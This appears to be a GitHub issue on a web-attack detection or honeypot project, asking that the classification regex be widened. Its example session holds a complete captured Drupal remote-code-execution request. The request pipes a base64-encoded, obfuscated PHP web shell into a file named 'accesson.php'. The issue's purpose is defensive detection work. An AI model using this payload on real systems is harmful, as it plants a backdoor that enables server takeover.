Open mzfr opened 4 years ago
I noticed that some of the sessions don't have attack_type in their paths dictionary.
attack_type
paths
Ex:
{'path': '/user/password?name%5B%23post_render%5D%5B0%5D=system&name%5B%23markup%5D=echo+PD9waHAgZWNobyA3NDU3NzM3KzczNjcyMzskcmFQb19yWmx1b0U9YmFzZTY0X2RlY29kZSgiWSIuY2hyKDEwOSkuIkYiLmNocigxMjIpLmNocig5MCkuIlQiLmNocig4OSkuY2hyKDQ4KS5jaHIoODgpLiIyIi4iUiIuImwiLiJZIi5jaHIoNTApLiI5Ii5jaHIoMTA3KS4iWiIuY2hyKDgxKS4iPSIuIj0iKTskeWRTSlB0bndyU3Y9YmFzZTY0X2RlY29kZShjaHIoODkpLiIyIi5jaHIoNTcpLmNocigxMTkpLmNocigxMDEpLmNocig4MSkuY2hyKDYxKS4iPSIpO2V2YWwoJHJhUG9fclpsdW9FKCRfUE9TVFtiYXNlNjRfZGVjb2RlKGNocig5NykuY2hyKDg3KS4iUSIuY2hyKDYxKSldKSk7aWYoJF9QT1NUW2Jhc2U2NF9kZWNvZGUoImQiLmNocig4OCkuY2hyKDY1KS4iPSIpXSA9PSBiYXNlNjRfZGVjb2RlKCJkIi4iWCIuY2hyKDY1KS5jaHIoNjEpKSl7QCR5ZFNKUHRud3JTdigkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoY2hyKDkwKS4ibSIuImwiLiJzIi5jaHIoOTApLiJRIi4iPSIuY2hyKDYxKSldW2Jhc2U2NF9kZWNvZGUoY2hyKDEwMCkuY2hyKDcxKS5jaHIoNDkpLiJ3Ii4iWCIuY2hyKDUwKS4iNSIuY2hyKDEwNCkuImIiLmNocig4NykuIlUiLmNocig2MSkpXSwkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoIloiLmNocigxMDkpLiJsIi4icyIuY2hyKDkwKS4iUSIuY2hyKDYxKS5jaHIoNjEpKV1bYmFzZTY0X2RlY29kZShjaHIoOTgpLiJtIi4iRiIuY2hyKDExNikuIloiLmNocig4MSkuY2hyKDYxKS4iPSIpXSk7fTsgPz4%3D%7C+base64+--decode%7C+tee+accesson.php', 'timestamp': 1590873349.0886896, 'response_status': 200}
I think we should modify regex so pattern like these are also detected.
I noticed that some of the sessions don't have
attack_type
in theirpaths
dictionary.Ex:
I think we should modify regex so pattern like these are also detected.